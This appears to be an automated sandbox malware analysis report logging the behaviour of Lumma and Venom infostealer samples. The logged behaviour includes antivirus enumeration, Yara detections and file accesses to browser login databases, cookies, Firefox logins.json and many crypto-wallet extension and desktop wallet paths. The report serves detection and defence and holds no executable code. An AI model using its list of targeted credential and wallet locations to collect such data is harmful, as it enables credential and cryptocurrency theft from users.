                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,5_2_00BA1718
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,5_2_00BA139F
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR
                  Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: MSASCui.exe
                  Source: vm.exe, 00000025.00000003.3562615440.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3445377464.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3553795958.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3435304768.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3755459555.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3313681579.0000000005668000.00000004.00000020.00020000.00000000.sdmp, vm.exe, 00000025.00000003.3672819972.0000000005668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: MsMpEng.exe
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: IXDaI.exe PID: 7516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IXDaI.exe PID: 7708, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 27.0.B552.exe.7ff75ee70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.B552.exe.7ff75ee70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: B552.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\B552.exe, type: DROPPED
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets~)W%
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
                  Source: BitLockerToGo.exe, 0000001F.00000003.2427860356.0000000002FD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletAU.$
                  Source: BitLockerToGo.exe, 0000001F.00000003.2427693258.0000000002FD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\BinanceZy
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                  Source: BitLockerToGo.exe, 0000001F.00000003.2427860356.0000000002FD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: 753F.exe, 0000001C.00000002.2846157779.00007FF7C0B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Source: BitLockerToGo.exe, 0000001F.00000003.2366071084.0000000002F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
